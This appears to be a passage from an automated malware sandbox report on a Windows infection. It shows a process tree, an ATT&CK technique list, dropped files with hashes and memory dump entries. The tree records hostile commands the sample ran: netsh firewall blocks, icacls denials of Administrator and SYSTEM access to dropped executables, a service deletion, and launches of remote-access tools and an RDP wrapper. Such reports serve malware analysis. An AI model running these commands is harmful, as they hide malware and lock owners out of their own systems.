C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186
4⤵
PID:5028

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186
5⤵
PID:4744

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186
4⤵
PID:4624

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186
5⤵
PID:4448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169
4⤵
PID:5032

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169
5⤵
PID:4496

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169
4⤵
PID:4868

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169
5⤵
PID:4468

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11
4⤵
PID:4732

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11
5⤵
PID:4824

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11
4⤵
PID:4484

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11
5⤵
PID:5024

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236
4⤵
PID:4208

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236
5⤵
PID:4944

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236
4⤵
PID:2040

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236
5⤵
PID:4480

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61
4⤵
PID:1492

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61
5⤵
PID:4796

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61
4⤵
PID:4800

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61
5⤵
PID:4312

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102
4⤵
PID:4100

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102
5⤵
PID:5080

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102
4⤵
PID:4316

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102
5⤵
PID:4164

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151
4⤵
PID:4424

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151
5⤵
PID:4352

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151
4⤵
PID:4392

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151
5⤵
PID:4876

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26
4⤵
PID:4476

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26
5⤵
PID:4784

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26
4⤵
PID:4256

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26
5⤵
PID:4180

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230
4⤵
PID:4460

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230
5⤵
PID:2024

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230
4⤵
PID:492

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230
5⤵
PID:4372

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)
4⤵
PID:4548

C:\Windows\SysWOW64\icacls.exe
icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:5040

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)
4⤵
PID:4700

C:\Windows\SysWOW64\icacls.exe
icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:4604

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)
4⤵
PID:4280

C:\Windows\SysWOW64\icacls.exe
icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:4620

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)
4⤵
PID:4736

C:\Windows\SysWOW64\icacls.exe
icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:4564

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)
4⤵
PID:4740

C:\Windows\SysWOW64\icacls.exe
icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:4684

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)
4⤵
PID:4752

C:\Windows\SysWOW64\icacls.exe
icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:4848

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)
4⤵
PID:816

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:4120

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)
4⤵
PID:4364

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:912

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)
4⤵
PID:2240

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:4504

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)
4⤵
PID:4440

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:1788

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
4⤵
PID:4376

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
5⤵
- Modifies file permissions
PID:4996

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete swprv
2⤵
PID:1432

C:\Windows\SysWOW64\sc.exe
sc delete swprv
3⤵
PID:1832

C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3444

C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2388

C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe /tray
3⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:2432

C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe /tray
2⤵
- Executes dropped EXE
PID:2412

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:3780

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s TermService
1⤵
PID:2024

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
PID:8

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Modify Existing Service

T1031

Hidden Files and Directories

T1158

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Winlogon Helper DLL

T1004

Privilege Escalation

Bypass User Account Control

T1088

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Bypass User Account Control

T1088

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Intel\R8.exe

Download Submit
C:\ProgramData\Microsoft\Intel\taskhost.exe

Download Submit
C:\ProgramData\Microsoft\Intel\taskhost.exe

Download Submit
C:\ProgramData\Microsoft\Intel\wini.exe

Download Submit
C:\ProgramData\Microsoft\Intel\wini.exe

Download Submit
C:\ProgramData\RealtekHD\taskhostw.exe

Download Submit
C:\ProgramData\WindowsTask\winlogon.exe
MD5
ec0f9398d8017767f86a4d0e74225506

SHA1
720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36

SHA256
870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375

SHA512
d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

Download Submit
C:\ProgramData\Windows\install.vbs

Download Submit
C:\ProgramData\Windows\reg1.reg

Download Submit
C:\ProgramData\Windows\reg2.reg

Download Submit
C:\ProgramData\Windows\rfusclient.exe
MD5
b8667a1e84567fcf7821bcefb6a444af

SHA1
9c1f91fe77ad357c8f81205d65c9067a270d61f0

SHA256
dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

SHA512
ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

Download Submit
C:\ProgramData\Windows\rfusclient.exe
MD5
b8667a1e84567fcf7821bcefb6a444af

SHA1
9c1f91fe77ad357c8f81205d65c9067a270d61f0

SHA256
dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

SHA512
ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

Download Submit
C:\ProgramData\Windows\rfusclient.exe
MD5
b8667a1e84567fcf7821bcefb6a444af

SHA1
9c1f91fe77ad357c8f81205d65c9067a270d61f0

SHA256
dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

SHA512
ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

Download Submit
C:\ProgramData\Windows\rfusclient.exe
MD5
b8667a1e84567fcf7821bcefb6a444af

SHA1
9c1f91fe77ad357c8f81205d65c9067a270d61f0

SHA256
dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

SHA512
ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

Download Submit
C:\ProgramData\Windows\rutserv.exe
MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\rutserv.exe
MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\rutserv.exe
MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\rutserv.exe
MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\rutserv.exe
MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
C:\ProgramData\Windows\vp8decoder.dll
MD5
88318158527985702f61d169434a4940

SHA1
3cc751ba256b5727eb0713aad6f554ff1e7bca57

SHA256
4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74

SHA512
5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff

Download Submit
C:\ProgramData\Windows\vp8encoder.dll
MD5
6298c0af3d1d563834a218a9cc9f54bd

SHA1
0185cd591e454ed072e5a5077b25c612f6849dc9

SHA256
81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172

SHA512
389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe

Download Submit
C:\ProgramData\Windows\winit.exe

Download Submit
C:\ProgramData\Windows\winit.exe

Download Submit
C:\ProgramData\install\cheat.exe

Download Submit
C:\ProgramData\install\sys.exe
MD5
bfa81a720e99d6238bc6327ab68956d9

SHA1
c7039fadffccb79534a1bf547a73500298a36fa0

SHA256
222a8bb1b3946ff0569722f2aa2af728238778b877cebbda9f0b10703fc9d09f

SHA512
5ba1fab68a647e0a0b03d8fba5ab92f4bdec28fb9c1657e1832cfd54ee7b5087ce181b1eefce0c14b603576c326b6be091c41fc207b0068b9032502040d18bab

Download Submit
C:\ProgramData\install\sys.exe

Download Submit
C:\Programdata\Install\del.bat

Download Submit
C:\Programdata\RealtekHD\taskhostw.exe

Download Submit
C:\Programdata\WindowsTask\winlogon.exe
MD5
ec0f9398d8017767f86a4d0e74225506

SHA1
720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36

SHA256
870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375

SHA512
d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

Download Submit
C:\Programdata\Windows\install.bat

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB

Download Submit
C:\Windows\SysWOW64\drivers\conhost.exe

Download Submit
C:\programdata\install\cheat.exe

Download Submit
C:\programdata\microsoft\intel\R8.exe

Download Submit
C:\rdp\RDPWInst.exe

Download Submit
C:\rdp\RDPWInst.exe

Download Submit
C:\rdp\RDPWInst.exe

Download Submit
C:\rdp\Rar.exe

Download Submit
C:\rdp\Rar.exe

Download Submit
C:\rdp\bat.bat

Download Submit
C:\rdp\db.rar

Download Submit
C:\rdp\install.vbs

Download Submit
C:\rdp\pause.bat

Download Submit
C:\rdp\run.vbs

Download Submit
\??\PIPE\wkssvc

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.dll

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.ini

Download Submit
\Program Files\RDP Wrapper\rdpwrap.dll

Download Submit
\Users\Admin\AppData\Local\Temp\CE87CE80\mozglue.dll

Download Submit
\Users\Admin\AppData\Local\Temp\CE87CE80\msvcp140.dll

Download Submit
\Users\Admin\AppData\Local\Temp\CE87CE80\nss3.dll
MD5
556ea09421a0f74d31c4c0a89a70dc23

SHA1
f739ba9b548ee64b13eb434a3130406d23f836e3

SHA256
f0e6210d4a0d48c7908d8d1c270449c91eb4523e312a61256833bfeaf699abfb

SHA512
2481fc80dffa8922569552c3c3ebaef8d0341b80427447a14b291ec39ea62ab9c05a75e85eef5ea7f857488cab1463c18586f9b076e2958c5a314e459045ede2

Download Submit
\Users\Admin\AppData\Local\Temp\CE87CE80\vcruntime140.dll

Download Submit
memory/188-8-0x0000000000000000-mapping.dmp

Download
memory/196-263-0x0000000000000000-mapping.dmp

Download
memory/196-213-0x0000000000000000-mapping.dmp

Download
memory/200-214-0x0000000000000000-mapping.dmp

Download
memory/216-108-0x0000000000000000-mapping.dmp

Download
memory/224-59-0x0000000000000000-mapping.dmp

Download
memory/312-72-0x0000000000000000-mapping.dmp

Download
memory/392-104-0x0000000000000000-mapping.dmp

Download
memory/492-337-0x0000000000000000-mapping.dmp

Download
memory/508-66-0x0000000000000000-mapping.dmp

Download
memory/524-154-0x0000000000000000-mapping.dmp

Download
memory/568-268-0x0000000000000000-mapping.dmp

Download
memory/664-81-0x0000000000000000-mapping.dmp

Download
memory/668-100-0x0000000000000000-mapping.dmp

Download
memory/708-230-0x0000000000000000-mapping.dmp

Download
memory/712-99-0x0000000000000000-mapping.dmp

Download
memory/732-92-0x0000000000000000-mapping.dmp

Download
memory/796-277-0x0000000000000000-mapping.dmp

Download
memory/816-350-0x0000000000000000-mapping.dmp

Download
memory/828-60-0x0000000000000000-mapping.dmp

Download
memory/912-355-0x0000000000000000-mapping.dmp

Download
memory/1348-67-0x0000000000000000-mapping.dmp

Download
memory/1428-91-0x0000000000000000-mapping.dmp

Download
memory/1432-78-0x0000000000000000-mapping.dmp

Download
memory/1468-48-0x0000000000000000-mapping.dmp

Download
memory/1492-320-0x0000000000000000-mapping.dmp

Download
memory/1536-300-0x0000000000000000-mapping.dmp

Download
memory/1584-84-0x0000000000000000-mapping.dmp

Download
memory/1604-109-0x0000000000000000-mapping.dmp

Download
memory/1620-74-0x0000000000000000-mapping.dmp

Download
memory/1716-90-0x0000000000000000-mapping.dmp

Download
memory/1788-360-0x0000000000000000-mapping.dmp

Download
memory/1792-236-0x0000000000000000-mapping.dmp

Download
memory/1816-112-0x0000000000000000-mapping.dmp

Download
memory/1832-80-0x0000000000000000-mapping.dmp

Download
memory/1896-267-0x0000000000000000-mapping.dmp

Download
memory/1968-191-0x0000000000000000-mapping.dmp

Download
memory/1992-39-0x0000000000000000-mapping.dmp

Download
memory/2024-338-0x0000000000000000-mapping.dmp

Download
memory/2040-317-0x0000000000000000-mapping.dmp

Download
memory/2080-110-0x0000000000000000-mapping.dmp

Download
memory/2164-35-0x0000000002E80000-0x0000000002E81000-memory.dmp

Filesize
4KB

Download
memory/2164-32-0x0000000000000000-mapping.dmp

Download
memory/2164-36-0x0000000003680000-0x0000000003681000-memory.dmp

Filesize
4KB

Download
memory/2164-37-0x0000000002E80000-0x0000000002E81000-memory.dmp

Filesize
4KB

Download
memory/2180-57-0x0000000000000000-mapping.dmp

Download
memory/2204-173-0x0000000000000000-mapping.dmp

Download
memory/2208-210-0x0000000000000000-mapping.dmp

Download
memory/2236-41-0x0000000000000000-mapping.dmp

Download
memory/2240-356-0x0000000000000000-mapping.dmp

Download
memory/2244-70-0x0000000000000000-mapping.dmp

Download
memory/2264-111-0x0000000000000000-mapping.dmp

Download
memory/2332-245-0x0000000000000000-mapping.dmp

Download
memory/2388-56-0x00000000035E0000-0x00000000035E1000-memory.dmp

Filesize
4KB

Download
memory/2388-55-0x0000000002DE0000-0x0000000002DE1000-memory.dmp

Filesize
4KB

Download
memory/2388-52-0x0000000000000000-mapping.dmp

Download
memory/2392-98-0x0000000000000000-mapping.dmp

Download
memory/2404-229-0x0000000000000000-mapping.dmp

Download
memory/2412-51-0x0000000000000000-mapping.dmp

Download
memory/2416-232-0x0000000000000000-mapping.dmp

Download
memory/2432-68-0x0000000000000000-mapping.dmp

Download
memory/2544-179-0x0000000000000000-mapping.dmp

Download
memory/2624-258-0x0000000000000000-mapping.dmp

Download
memory/2696-24-0x0000000000000000-mapping.dmp

Download
memory/2736-95-0x0000000000000000-mapping.dmp

Download
memory/2740-289-0x0000000000000000-mapping.dmp

Download
memory/2744-302-0x0000000000000000-mapping.dmp

Download
memory/2768-4-0x0000000000000000-mapping.dmp

Download
memory/2776-88-0x0000000000000000-mapping.dmp

Download
memory/2880-149-0x0000000000000000-mapping.dmp

Download
memory/2988-27-0x0000000000000000-mapping.dmp

Download
memory/3076-87-0x0000000000000000-mapping.dmp

Download
memory/3092-89-0x0000000000000000-mapping.dmp

Download
memory/3108-58-0x0000000000000000-mapping.dmp

Download
memory/3156-107-0x0000000000000000-mapping.dmp

Download
memory/3284-23-0x0000000000000000-mapping.dmp

Download
memory/3332-249-0x0000000000000000-mapping.dmp

Download
memory/3448-192-0x0000000000000000-mapping.dmp

Download
memory/3548-250-0x0000000000000000-mapping.dmp

Download
memory/3580-61-0x0000000000000000-mapping.dmp

Download
memory/3644-281-0x0000000000000000-mapping.dmp

Download
memory/3648-194-0x0000000000000000-mapping.dmp

Download
memory/3744-75-0x0000000000000000-mapping.dmp

Download
memory/3892-297-0x0000000000000000-mapping.dmp

Download
memory/3904-29-0x0000000000000000-mapping.dmp

Download
memory/3908-31-0x0000000000000000-mapping.dmp

Download
memory/3944-276-0x0000000000000000-mapping.dmp

Download
memory/4044-73-0x0000000000000000-mapping.dmp

Download
memory/4084-280-0x0000000000000000-mapping.dmp

Download
memory/4100-324-0x0000000000000000-mapping.dmp

Download
memory/4104-246-0x0000000000000000-mapping.dmp

Download
memory/4112-270-0x0000000000000000-mapping.dmp

Download
memory/4116-113-0x0000000000000000-mapping.dmp

Download
memory/4120-352-0x0000000000000000-mapping.dmp

Download
memory/4128-265-0x0000000000000000-mapping.dmp

Download
memory/4132-226-0x0000000000000000-mapping.dmp

Download
memory/4136-114-0x0000000000000000-mapping.dmp

Download
memory/4148-228-0x0000000000000000-mapping.dmp

Download
memory/4156-266-0x0000000000000000-mapping.dmp

Download
memory/4160-150-0x0000000000000000-mapping.dmp

Download
memory/4164-327-0x0000000000000000-mapping.dmp

Download
memory/4168-151-0x0000000000000000-mapping.dmp

Download
memory/4172-237-0x0000000000000000-mapping.dmp

Download
memory/4176-115-0x0000000000000000-mapping.dmp

Download
memory/4180-335-0x0000000000000000-mapping.dmp

Download
memory/4184-264-0x0000000000000000-mapping.dmp

Download
memory/4188-290-0x0000000000000000-mapping.dmp

Download
memory/4204-118-0x0000000000000000-mapping.dmp

Download
memory/4208-316-0x0000000000000000-mapping.dmp

Download
memory/4212-235-0x0000000000000000-mapping.dmp

Download
memory/4216-193-0x0000000000000000-mapping.dmp

Download
memory/4220-153-0x0000000000000000-mapping.dmp

Download
memory/4228-269-0x0000000000000000-mapping.dmp

Download
memory/4232-285-0x0000000000000000-mapping.dmp

Download
memory/4236-152-0x0000000000000000-mapping.dmp

Download
memory/4240-120-0x0000000000000000-mapping.dmp

Download
memory/4244-156-0x0000000000000000-mapping.dmp

Download
memory/4248-294-0x0000000000000000-mapping.dmp

Download
memory/4252-251-0x0000000000000000-mapping.dmp

Download
memory/4256-333-0x0000000000000000-mapping.dmp

Download
memory/4260-215-0x0000000000000000-mapping.dmp

Download
memory/4264-216-0x0000000000000000-mapping.dmp

Download
memory/4268-155-0x0000000000000000-mapping.dmp

Download
memory/4272-121-0x0000000000000000-mapping.dmp

Download
memory/4280-343-0x0000000000000000-mapping.dmp

Download
memory/4284-122-0x0000000000000000-mapping.dmp

Download
memory/4292-233-0x0000000000000000-mapping.dmp

Download
memory/4296-288-0x0000000000000000-mapping.dmp

Download
memory/4300-159-0x0000000000000000-mapping.dmp

Download
memory/4304-157-0x0000000000000000-mapping.dmp

Download
memory/4308-298-0x0000000000000000-mapping.dmp

Download
memory/4312-323-0x0000000000000000-mapping.dmp

Download
memory/4316-325-0x0000000000000000-mapping.dmp

Download
memory/4324-195-0x0000000000000000-mapping.dmp

Download
memory/4328-160-0x0000000000000000-mapping.dmp

Download
memory/4332-158-0x0000000000000000-mapping.dmp

Download
memory/4336-123-0x0000000000000000-mapping.dmp

Download
memory/4344-287-0x0000000000000000-mapping.dmp

Download
memory/4348-196-0x0000000000000000-mapping.dmp

Download
memory/4352-330-0x0000000000000000-mapping.dmp

Download
memory/4356-124-0x0000000000000000-mapping.dmp

Download
memory/4364-354-0x0000000000000000-mapping.dmp

Download
memory/4368-199-0x0000000000000000-mapping.dmp

Download
memory/4372-339-0x0000000000000000-mapping.dmp

Download
memory/4376-359-0x0000000000000000-mapping.dmp

Download
memory/4384-197-0x0000000000000000-mapping.dmp

Download
memory/4388-161-0x0000000000000000-mapping.dmp

Download
memory/4392-329-0x0000000000000000-mapping.dmp

Download
memory/4396-198-0x0000000000000000-mapping.dmp

Download
memory/4400-125-0x0000000000000000-mapping.dmp

Download
memory/4404-218-0x0000000000000000-mapping.dmp

Download
